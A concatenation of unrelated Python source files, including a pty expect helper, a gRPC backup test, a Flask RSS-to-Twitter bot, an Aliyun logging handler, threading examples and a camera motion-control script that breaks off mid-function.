self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
while timeleft >= 0 :
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
pass
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536)
queue.put(data)
except:
if kill_event.is_set():
break
raise
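# --- Hedged usage sketch (editorial addition, not part of the original module) ---
# spawn() runs a command on a pty and returns an IO object whose expect() blocks
# until the regex matches or the configured timeout elapses (this module targets
# Python 2, like the Queue import above). The command and the echoed marker are
# assumptions for illustration only.
#
#   io = spawn(['bash', '--norc'])
#   io.timeout(10)
#   io.eol('\n')
#   with io:
#       io.send('echo uexpect-ready')
#       io.expect('uexpect-ready')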
|
test_upload_and_restore.py
|
import filecmp
import os
import tempfile
import threading
from concurrent import futures
import grpc
import pytest
from pysrbup.backup_system_pb2_grpc import (BackupStub,
add_BackupServicer_to_server)
from pysrbup.client import BackupClient
from pysrbup.server import BackupServicer, create_dictionary
OPTIONS = [('grpc.max_send_message_length', 1024**3),
('grpc.max_receive_message_length', 1024**3)]
SERVER_ADDRESS = '127.0.0.1:50000'
THREADS = 2
def start_server():
with tempfile.TemporaryDirectory() as backup_dir:
dictionary_file = create_dictionary(backup_dir)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=THREADS),
options=OPTIONS)
add_BackupServicer_to_server(
BackupServicer(backup_dir, dictionary_file), server)
server.add_insecure_port(SERVER_ADDRESS)
server.start()
server.wait_for_termination()
@pytest.fixture
def server_fixture():
server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()
@pytest.fixture
def client_fixture():
channel = grpc.insecure_channel(SERVER_ADDRESS, options=OPTIONS)
stub = BackupStub(channel)
return BackupClient(stub)
# pylint: disable=unused-argument,redefined-outer-name
def test_upload_and_restore(server_fixture, client_fixture):
key = client_fixture.generate_key()
dir_to_backup = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'data')
backup_id = client_fixture.upload_backup(dir_to_backup, key, THREADS)
with tempfile.TemporaryDirectory() as restore_to_dir:
client_fixture.restore_backup(backup_id, restore_to_dir, key)
assert are_equal_dirs(
dir_to_backup,
os.path.join(restore_to_dir, os.path.basename(dir_to_backup)))
def are_equal_dirs(dir1, dir2):
comp_obj = filecmp.dircmp(dir1, dir2)
if len(comp_obj.left_only) > 0 or len(comp_obj.right_only) > 0:
return False
common_dirs = comp_obj.common_dirs
comp_result = filecmp.cmpfiles(dir1, dir2, comp_obj.common_files)
return (not comp_result[1] and not comp_result[2]) and all(
are_equal_dirs(os.path.join(dir1, common_dirs[i]),
os.path.join(dir2, common_dirs[i]))
for i in range(len(common_dirs)))
|
server.py
|
from flask import Flask,render_template,request,jsonify
import multiprocessing as mp
import feedparser
import tweepy
import time
from dateutil import parser
#config
app = Flask(__name__)
#setup variables
setup=[]
feed=[]
running=False
process=None
user = "Bot Inactive"
#authenticating twitter account
def authenticate():
global user
auth = tweepy.OAuthHandler(setup[0], setup[1])
auth.set_access_token(setup[2], setup[3])
api = tweepy.API(auth)
user=api.me().screen_name
return api
#start bot process
def start():
global process
try:
authenticate()
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return False
if not running:
process=mp.Process(target=feedUpdate, args=(setup,feed))
process.start()
return True
return False
#terminate bot process
def stop():
global process
try:
if running:
process.terminate()
process=None
print("\nBot Stopped\n")
return True
return False
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return False
#bot
def feedUpdate(setup,urls):
print("\nBot Started\n")
auth = tweepy.OAuthHandler(setup[0], setup[1])
auth.set_access_token(setup[2], setup[3])
ap = tweepy.API(auth)
lastUpdate = time.time()
tweetInterval=int(setup[4])
startTime = lastUpdate
while True:
        if (time.time() - lastUpdate) < tweetInterval:
            time.sleep(1)  # avoid busy-waiting between feed checks
            continue
print("\n!! Fetching Updates !!\n")
for url in urls:
feed = feedparser.parse(url)
for feeds in feed['entries']:
dt = parser.parse(feeds["published"]).timestamp()
if lastUpdate < dt:
print("\n**New Feed Posted From "+str(feed['feed']['title'])+'\n-->'+feeds['title']+'\n')
msg = feeds['title']+" "+feeds['link']
try:
ap.update_status(msg)
except Exception as e:
print("\n!! ERROR : "+str(e)+" !!\n")
lastUpdate = time.time()
#routes
#homepage
@app.route('/index/')
@app.route('/')
def index():
if setup==[]:
return render_template('index.html',erorr="Bot not Configured. Visit Settings tab to configure.",run=running,user=user)
return render_template('index.html',run=running,user=user)
#settings route
@app.route('/settings/',methods = ['POST', 'GET'])
def settings():
global setup
global running
if request.method == 'POST':
try:
setup=[]
setup.append(request.form['consumer_key']+"\n")
setup.append(request.form['consumer_secret_key']+"\n")
setup.append(request.form['access_token']+"\n")
setup.append(request.form['access_token_secret']+"\n")
setup.append(request.form['interval']+"\n")
file = open("secret.txt","w")
file.writelines(setup)
file.close()
setup = [x.rstrip() for x in setup]
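            # If the bot is already running, restart it so the new credentials take effect;
            # stop() and start() each check the global `running` flag themselves, hence the
            # toggling of `running` around the calls below.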
if running:
stop()
running=not running
start()
running=not running
except Exception as e:
print("\n!! ERROR : "+str(e)+" !!\n")
return render_template('settings.html',setup=setup,message="ERROR Please Check Again")
return render_template('settings.html',setup=setup,message="UPDATED SUCCESFULLY")
else:
return render_template('settings.html',setup=setup)
#feed edit route
@app.route('/feed_list/',methods = ['POST', 'GET'])
def feed_list():
global feed
global running
update=""
if request.method == 'POST':
feed=[x.rstrip().replace('\t','') for x in request.form['feed_list'].split('\n') if x.rstrip().replace('\t','')!=""]
print("\nFeed List updated:-\n",feed)
try:
file = open("feed_list.txt","w")
file.writelines([x+"\n" for x in feed])
file.close()
if running:
stop()
running=not running
start()
running=not running
update="UPDATED SUCCESFULLY"
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
update="ERROR : COULDN'T UPDATE"
return render_template('feed_list.html',feed=feed,message=update)
#bot access route
@app.route('/changestate')
def changestate():
global running
global user
if request.method != 'GET':
return "ERORR"
state = request.args.get('state')
if state!=str(running) or setup==[]:
return jsonify(
resp="False",
erorr="Configuration Erorr"
)
elif feed==[]:
return jsonify(
resp="False",
erorr="Feed List is Empty. Add RSS Feeds"
)
else:
if not running:
if start():
resp=jsonify(pstate=str(not running),resp='True',stat='Running',color='#25abff',user=user)
running= not running
return resp
else:
return jsonify(resp="False",erorr="PROCESS/AUTH ERORR")
else:
if stop():
user="Bot Inactive"
resp=jsonify(pstate=str(not running),resp='True',stat='Start',color='red',user=user)
running= not running
return resp
else:
return jsonify(resp="False",erorr="PROCESS ERORR")
#post manual tweet
@app.route('/tweets/',methods = ['POST', 'GET'])
def tweet_man():
if setup==[]:
return render_template('tweet.html',message="Bot not Configured. Visit Settings tab to configure.")
if request.method == 'POST':
try:
api = authenticate()
try:
msg=request.form['status']
print(msg)
                if msg is None or msg.strip() == '':
raise Exception('Value Not Present')
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return render_template('tweet.html',message="ERROR : Empty Status")
api.update_status(msg)
return render_template('tweet.html',message="Status Updated")
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return render_template('tweet.html',message="Authentication ERROR. Re-Configure Bot.")
return render_template('tweet.html')
#main running development server
if __name__ == '__main__':
running=False
#initializing if setup exists
try:
file = open("secret.txt","r")
setup = [x.rstrip() for x in file.readlines()]
file.close()
except:
pass
try:
file = open("feed_list.txt","r")
feed = [x.rstrip() for x in file.readlines()]
file.close()
except:
pass
app.run()
|
logger_hanlder.py
|
import re
import sys
import json
import atexit
import logging
import traceback
from enum import Enum
from time import time, sleep
from threading import Thread
import six
from .logclient import LogClient
from .logitem import LogItem
from .putlogsrequest import PutLogsRequest
from .version import LOGGING_HANDLER_USER_AGENT
try:
from collections.abc import Callable
except ImportError:
from collections import Callable
if six.PY2:
from Queue import Empty, Full, Queue
else:
from queue import Empty, Full, Queue
class LogFields(Enum):
"""fields used to upload automatically
Possible fields:
record_name, level, func_name, module,
file_path, line_no, process_id,
process_name, thread_id, thread_name
"""
record_name = 'name'
level = 'levelname'
file_name = 'filename'
func_name = 'funcName'
module = 'module'
file_path = 'pathname'
line_no = 'lineno'
process_id = 'process'
process_name = 'processName'
thread_id = 'thread'
thread_name = 'threadName'
level_no = 'levelno'
asc_time = 'asctime'
created_timestamp = 'created'
micro_second = 'msecs'
relative_created = 'relativeCreated'
DEFAULT_RECORD_LOG_FIELDS = set((LogFields.record_name, LogFields.level,
LogFields.func_name, LogFields.module,
LogFields.file_path, LogFields.line_no,
LogFields.process_id, LogFields.process_name,
LogFields.thread_id, LogFields.thread_name))
BLACK_FIELD_LIST = set(['exc_info', 'exc_text', 'stack_info', 'msg', 'args', 'message'])
BUILTIN_LOG_FIELDS_NAMES = set(x for x in dir(LogFields) if not x.startswith('__'))
BUILTIN_LOG_FIELDS_NAMES.update(set(LogFields[x].value for x in BUILTIN_LOG_FIELDS_NAMES))
BUILTIN_LOG_FIELDS_NAMES.update(BLACK_FIELD_LIST)
class SimpleLogHandler(logging.Handler, object):
"""
SimpleLogHandler, blocked sending any logs, just for simple test purpose
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, by default is empty
    :param fields: list of LogFields or list of names of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name; you could also just use the string name like 'thread_name'. It's also possible to customize extra fields in this list by disabling extra fields and putting a white list here.
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
    :param extract_kv_sep: separator for KV case, default is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True. Note: the extra field will also be handled with buildin_fields_prefix/suffix
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, end_point, access_key_id, access_key, project, log_store, topic=None, fields=None,
buildin_fields_prefix=None, buildin_fields_suffix=None,
extract_json=None, extract_json_drop_message=None,
extract_json_prefix=None, extract_json_suffix=None,
extract_kv=None, extract_kv_drop_message=None,
extract_kv_prefix=None, extract_kv_suffix=None,
extract_kv_sep=None, extra=None,
**kwargs):
logging.Handler.__init__(self, **kwargs)
self.end_point = end_point
self.access_key_id = access_key_id
self.access_key = access_key
self.project = project
self.log_store = log_store
self.client = None
self.topic = topic
self.fields = DEFAULT_RECORD_LOG_FIELDS if fields is None else set(fields)
self.extract_json = False if extract_json is None else extract_json
self.extract_json_prefix = "" if extract_json_prefix is None else extract_json_prefix
self.extract_json_suffix = "" if extract_json_suffix is None else extract_json_suffix
self.extract_json_drop_message = False if extract_json_drop_message is None else extract_json_drop_message
self.buildin_fields_prefix = "" if buildin_fields_prefix is None else buildin_fields_prefix
self.buildin_fields_suffix = "" if buildin_fields_suffix is None else buildin_fields_suffix
self.extract_kv = False if extract_kv is None else extract_kv
self.extract_kv_prefix = "" if extract_kv_prefix is None else extract_kv_prefix
self.extract_kv_suffix = "" if extract_kv_suffix is None else extract_kv_suffix
self.extract_kv_drop_message = False if extract_kv_drop_message is None else extract_kv_drop_message
self.extract_kv_sep = "=" if extract_kv_sep is None else extract_kv_sep
self.extract_kv_ptn = self._get_extract_kv_ptn()
self.extra = True if extra is None else extra
def set_topic(self, topic):
self.topic = topic
def create_client(self):
self.client = LogClient(self.end_point, self.access_key_id, self.access_key)
self.client.set_user_agent(LOGGING_HANDLER_USER_AGENT)
def send(self, req):
if self.client is None:
self.create_client()
return self.client.put_logs(req)
def set_fields(self, fields):
self.fields = fields
@staticmethod
def _n(v):
if v is None:
return ""
if isinstance(v, (dict, list, tuple)):
try:
v = json.dumps(v)
except Exception:
pass
elif six.PY2 and isinstance(v, six.text_type):
v = v.encode('utf8', "ignore")
elif six.PY3 and isinstance(v, six.binary_type):
v = v.decode('utf8', "ignore")
return str(v)
def extract_dict(self, message):
data = []
if isinstance(message, dict):
for k, v in six.iteritems(message):
data.append(("{0}{1}{2}".format(self.extract_json_prefix, self._n(k),
self.extract_json_suffix), self._n(v)))
return data
def _get_extract_kv_ptn(self):
sep = self.extract_kv_sep
p1 = u'(?!{0})([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)\\s*{0}\\s*([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)'
p2 = u'(?!{0})([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)\\s*{0}\\s*"\s*([^"]+?)\s*"'
ps = '|'.join([p1, p2]).format(sep)
return re.compile(ps)
def extract_kv_str(self, message):
if isinstance(message, six.binary_type):
message = message.decode('utf8', 'ignore')
r = self.extract_kv_ptn.findall(message)
data = []
for k1, v1, k2, v2 in r:
if k1:
data.append(("{0}{1}{2}".format(self.extract_kv_prefix, self._n(k1),
self.extract_kv_suffix), self._n(v1)))
elif k2:
data.append(("{0}{1}{2}".format(self.extract_kv_prefix, self._n(k2),
self.extract_kv_suffix), self._n(v2)))
return data
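    # Worked example (with empty prefix/suffix and the default '=' separator):
    #   extract_kv_str('k1=v1 k2="v 2"')  ->  [('k1', 'v1'), ('k2', 'v 2')]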
def _add_record_fields(self, record, k, contents):
v = getattr(record, k, None)
if v is None or isinstance(v, Callable):
return
v = self._n(v)
contents.append(("{0}{1}{2}".format(self.buildin_fields_prefix, k, self.buildin_fields_suffix), v))
def make_log_item(self, record):
contents = []
message_field_name = "{0}message{1}".format(self.buildin_fields_prefix, self.buildin_fields_suffix)
if isinstance(record.msg, dict) and self.extract_json:
data = self.extract_dict(record.msg)
contents.extend(data)
if not self.extract_json_drop_message or not data:
contents.append((message_field_name, self.format(record)))
elif isinstance(record.msg, (six.text_type, six.binary_type)) and self.extract_kv:
data = self.extract_kv_str(record.msg)
contents.extend(data)
if not self.extract_kv_drop_message or not data: # if it's not KV
contents.append((message_field_name, self.format(record)))
else:
contents = [(message_field_name, self.format(record))]
# add builtin fields
for x in self.fields:
k = x
if isinstance(x, LogFields):
k = x.name
x = x.value
elif isinstance(x, (six.binary_type, six.text_type)):
if x in BLACK_FIELD_LIST:
continue # by pass for those reserved fields. make no sense to render them
if x in BUILTIN_LOG_FIELDS_NAMES:
k = LogFields[x].name
x = LogFields[x].value
elif self.extra: # will handle it later
continue
self._add_record_fields(record, x, contents)
# handle extra
if self.extra:
for x in dir(record):
if not x.startswith('__') and not x in BUILTIN_LOG_FIELDS_NAMES:
self._add_record_fields(record, x, contents)
return LogItem(contents=contents, timestamp=record.created)
def emit(self, record):
try:
item = self.make_log_item(record)
req = PutLogsRequest(self.project, self.log_store, self.topic, logitems=[item, ])
self.send(req)
except Exception as e:
self.handleError(record)
class QueuedLogHandler(SimpleLogHandler):
"""
Queued Log Handler, tuned async log handler.
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, default is empty
:param fields: list of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name
:param queue_size: queue size, default is 40960 logs, about 10MB ~ 40MB
    :param put_wait: maximum delay before sending the logs, by default 2 seconds; the emitter waits double that time when the queue is full.
    :param close_wait: when the program exits, it will try to send all logs still in the queue within this time period, by default 5 seconds
    :param batch_size: merge this count of logs and send them in one batch, by default min(1024, queue_size)
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
    :param extract_kv_sep: separator for KV case, default is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, end_point, access_key_id, access_key, project, log_store, topic=None, fields=None,
queue_size=None, put_wait=None, close_wait=None, batch_size=None,
buildin_fields_prefix=None, buildin_fields_suffix=None,
extract_json=None, extract_json_drop_message=None,
extract_json_prefix=None, extract_json_suffix=None,
extract_kv=None, extract_kv_drop_message=None,
extract_kv_prefix=None, extract_kv_suffix=None,
extract_kv_sep=None,
extra=None,
**kwargs):
super(QueuedLogHandler, self).__init__(end_point, access_key_id, access_key, project, log_store,
topic=topic, fields=fields,
extract_json=extract_json,
extract_json_drop_message=extract_json_drop_message,
extract_json_prefix=extract_json_prefix,
extract_json_suffix=extract_json_suffix,
buildin_fields_prefix=buildin_fields_prefix,
buildin_fields_suffix=buildin_fields_suffix,
extract_kv=extract_kv,
extract_kv_drop_message=extract_kv_drop_message,
extract_kv_prefix=extract_kv_prefix,
extract_kv_suffix=extract_kv_suffix,
extract_kv_sep=extract_kv_sep,
extra=extra,
**kwargs)
self.stop_flag = False
self.stop_time = None
self.put_wait = put_wait or 2 # default is 2 seconds
self.close_wait = close_wait or 5 # default is 5 seconds
self.queue_size = queue_size or 40960 # default is 40960, about 10MB ~ 40MB
self.batch_size = min(batch_size or 1024, self.queue_size) # default is 1024 items
self.init_worker()
def init_worker(self):
self.worker = Thread(target=self._post)
self.queue = Queue(self.queue_size)
        self.worker.daemon = True
self.worker.start()
atexit.register(self.stop)
def flush(self):
self.stop()
def stop(self):
self.stop_time = time()
self.stop_flag = True
self.worker.join(timeout=self.close_wait + 1)
def emit(self, record):
log_item = self.make_log_item(record)
try:
self.queue.put(log_item, timeout=self.put_wait*2)
except Full as ex:
self.handleError(record)
def _get_batch_log_items(self, timeout=None):
"""try to get log items as fast as possible, once empty and stop flag or time-out, just return Empty"""
log_items = []
start_time = time()
while len(log_items) < self.batch_size and (time() - start_time) < timeout:
try:
log_item = self.queue.get(block=True, timeout=0.1)
log_items.append(log_item)
except Empty:
if self.stop_flag:
break
return log_items
def _post(self):
while not self.stop_flag or (time() - self.stop_time) <= self.close_wait:
items = self._get_batch_log_items(self.put_wait)
if not items:
continue
try:
req = PutLogsRequest(self.project, self.log_store, self.topic, logitems=items)
self.send(req)
except Exception as ex:
sys.stderr.write('--- Aliyun %s Worker Send Log Failed, Log Item Count: %s ---\n' % (self, len(items)))
traceback.print_exc(limit=None, file=sys.stderr)
class UwsgiQueuedLogHandler(QueuedLogHandler):
"""
    Queued Log Handler for uWSGI; depends on the `uwsgidecorators` library, which needs to be deployed separately.
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, default is empty
:param fields: list of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name
:param queue_size: queue size, default is 40960 logs, about 10MB ~ 40MB
    :param put_wait: maximum delay before sending the logs, by default 2 seconds; the emitter waits double that time when the queue is full.
    :param close_wait: when the program exits, it will try to send all logs still in the queue within this time period, by default 2 seconds
    :param batch_size: merge this count of logs and send them in one batch, by default min(1024, queue_size)
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
    :param extract_kv_sep: separator for KV case, default is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, *args, **kwargs):
# change close_wait from default 5 to 2
if len(args) >= 10:
if args[9] is None:
args = args[:9] + (2,) + args[10:]
elif 'close_wait' in kwargs and kwargs['close_wait'] is None:
kwargs['close_wait'] = 2
super(UwsgiQueuedLogHandler, self).__init__(*args, **kwargs)
def init_worker(self):
self.queue = Queue(self.queue_size)
from uwsgidecorators import postfork, thread
self._post = postfork(thread(self._post))
def stop(self):
self.stop_time = time()
self.stop_flag = True
|
CAPSTONEPT2edit.py
|
import hashlib
import time
import os
import multiprocessing as mp
import concurrent.futures
from threading import Thread
hashvalues = []
threads = []
processes = []
cpus = os.cpu_count()
textfile = "sampleData.txt"
currentDir = os.getcwd()
text_file = open(os.path.join(currentDir, textfile), 'r')
text = text_file.readlines() * 10
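# Split the replicated lines into chunks of `cpus` lines each; each thread created below hashes a
# contiguous slice of these chunks.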
chunks = [text[x:x+cpus] for x in range(0, len(text), cpus)]
num_chunks = len(chunks)  # number of chunks (avoid shadowing the built-in max())
text_file.close()
def encrypt(data):
for line in data:
hashvalues.append(hashlib.sha256(line.encode()))
def encrypt_parallel(data):
for chunk in data:
for line in chunk:
hashvalues.append(hashlib.sha256(line.encode()))
def showValues():
for hash in hashvalues:
print(hash.digest())
if __name__ == "__main__":
#xxxxxxxxSERIALxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
'''
startTime = time.time()
encrypt(text)
stopTime = time.time()
serialTime = stopTime - startTime
#showValues()
hashvalues = []
#xxxxxxxxMULTITHREADING USING THREAD POOLxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
startTime = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=cpus) as \
executor:
for chunk in chunks:
executor.submit(encrypt, chunk)
stopTime = time.time()
mt_time = stopTime - startTime
showValues()
hashvalues = []
'''
#xxxxxxxxMULTITHREADING USING THREAD OBJECTxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
startTime = time.time()
i = 0
for thread in range(cpus):
        thread = Thread(target=encrypt_parallel, args=[chunks[int(i * num_chunks / cpus):int((i + 1) * num_chunks / cpus)]])
thread.start()
threads.append(thread)
i += 1
for thread in threads:
thread.join()
stopTime = time.time()
thread_time = stopTime - startTime
showValues()
'''
print(f'Serial time to encode: {(serialTime)}')
print(f'Multithreading(thread-pool) time to encode: {(mt_time)}')
'''
print(f'Multithreading(using thread objects) time to encode: {(thread_time)}')
|
game_loop_process.py
|
import asyncio
from aiohttp import web
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from multiprocessing import Queue, Process
import os
from time import sleep
async def handle(request):
index = open("index.html", 'rb')
content = index.read()
return web.Response(body=content, content_type='text/html')
tick = asyncio.Condition()
async def wshandler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
recv_task = None
tick_task = None
while 1:
if not recv_task:
recv_task = asyncio.ensure_future(ws.receive())
if not tick_task:
await tick.acquire()
tick_task = asyncio.ensure_future(tick.wait())
done, pending = await asyncio.wait(
[recv_task,
tick_task],
return_when=asyncio.FIRST_COMPLETED)
if recv_task in done:
msg = recv_task.result()
if msg.tp == web.MsgType.text:
print("Got message %s" % msg.data)
ws.send_str("Pressed key code: {}".format(msg.data))
elif msg.tp == web.MsgType.close or\
msg.tp == web.MsgType.error:
break
recv_task = None
if tick_task in done:
ws.send_str("game loop ticks")
tick.release()
tick_task = None
return ws
def game_loop(asyncio_loop):
    # coroutine scheduled onto the main thread's event loop via run_coroutine_threadsafe
async def notify():
await tick.acquire()
tick.notify_all()
tick.release()
queue = Queue()
# function to run in a different process
def worker():
while 1:
print("doing heavy calculation in process {}".format(os.getpid()))
sleep(1)
queue.put("calculation result")
Process(target=worker).start()
while 1:
# blocks this thread but not main thread with event loop
result = queue.get()
print("getting {} in process {}".format(result, os.getpid()))
task = asyncio.run_coroutine_threadsafe(notify(), asyncio_loop)
task.result()
asyncio_loop = asyncio.get_event_loop()
executor = ThreadPoolExecutor(max_workers=1)
asyncio_loop.run_in_executor(executor, game_loop, asyncio_loop)
app = web.Application()
app.router.add_route('GET', '/connect', wshandler)
app.router.add_route('GET', '/', handle)
web.run_app(app)
|
threadtest.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""" a test module """
__author__ = 'zmy'
import time, threading
# Code to be executed by the new thread:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
# Assume this is your bank balance:
balance = 0
lock = threading.Lock()
def change_it(n):
    # Deposit first, then withdraw; the result should be 0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
# for i in range(100000):
# change_it(n)
for i in range(100000):
        # Acquire the lock first:
lock.acquire()
try:
            # Now it is safe to modify the balance:
change_it(n)
finally:
            # Always release the lock when done:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
main.py
|
print('Import io')
import io
print('Import os')
import os
print('Import base64')
import base64
print('Import cv2')
import cv2
print('Import json')
import json
print('Import time')
import time
print('Import queue')
import queue
print('Import threading')
import threading
print('Import flask')
from flask import Flask, send_from_directory, request, Response
print('Import flask_sock')
from flask_sock import Sock
print('Import Simple PID')
from simple_pid import PID
print('Import StreamCamera')
from camera import StreamCamera
print('Import EmotimoSerial')
from emotimo_serial import EmotimoSerial
print('Import adb module')
from adb_android import ADBControl
print('Import Serial')
import serial.tools.list_ports as list_ports
# Get Camera Ready
streamingQ = queue.Queue()
controlQ = queue.Queue()
sc = StreamCamera(
{"framerate": 10},
streamingQ,
controlQ
)
sc.initialize_camera()
sc.start_capture()
streaming = True
# Android Debug Bridge Setup
adb = ADBControl({})
# Get Emotimo Ready
em = EmotimoSerial()
em_ready = False
em_status = {
"pan": 0,
"tilt": 0,
"slide": 0
}
# Camera Movement Control
pan_limits = (
-50000,
50000
)
tilt_limits = (
-20000,
30000
)
pid_x = PID(
20,
0,
0,
0
)
pid_y = PID(
20,
0,
0,
0
)
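# simple_pid's PID takes (Kp, Ki, Kd, setpoint) positionally, so these are proportional-only
# controllers (Kp=20) with a setpoint of 0: calling pid_x(dx) / pid_y(dy) returns an output that
# drives the measured pixel offset toward zero (see process_diff below).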
enable_pts_move = False
control_loop_enabled = True
camera_shooting = False
pts_interval = 1
def emotimo_open_serial():
print("Opening Em Connection")
em.open_connection()
def emotimo_close_serial():
print("Closing Em Connection")
em.close_connection()
def emotimo_ready_serial():
global em_ready
print("Setting Pulse Rate")
em.set_pulse_rate(1, 20000)
em.set_pulse_rate(2, 20000)
em.set_pulse_rate(3, 20000)
print("Zeroing all Motors")
em.zero_all_motors()
em_ready = True
print("Em Now Ready")
def emotimo_move_all(pan, tilt, slide, ignore_slide=True):
global em_ready
global em_status
if not em_ready:
print("Em Unavailable")
return
em_ready = False
print('Set Pan: %s' % str(pan))
print('Set Tilt: %s' % str(tilt))
print('Set Slide: %s' % str(slide))
# Enforce Limits
if pan < 0:
pan = max(pan, pan_limits[0])
if pan > 0:
pan = min(pan, pan_limits[1])
if tilt < 0:
tilt = max(tilt, tilt_limits[0])
if tilt > 0:
tilt = min(tilt, tilt_limits[1])
em.set_all(
{
"pan": pan,
"tilt": tilt,
"slide": slide
},
ignore_slide
)
em_status["pan"] = pan
em_status["tilt"] = tilt
em_status["slide"] = slide
em_ready = True
def emotimo_move(pts, direction, pan_increment=1000, tilt_increment=1000, slide_increment=10000):
global em_ready
global em_status
if not em_ready:
print("Em Unavailable")
return
em_ready = False
if pts == 'tilt' and direction == 'up':
cur_value = em_status['tilt']
cur_value += tilt_increment
print('Set Tilt: %s' % str(cur_value))
em.set_tilt(cur_value)
em_status['tilt'] = cur_value
em_ready = True
if pts == 'tilt' and direction == 'down':
cur_value = em_status['tilt']
cur_value -= tilt_increment
print('Set Tilt: %s' % str(cur_value))
em.set_tilt(cur_value)
em_status['tilt'] = cur_value
em_ready = True
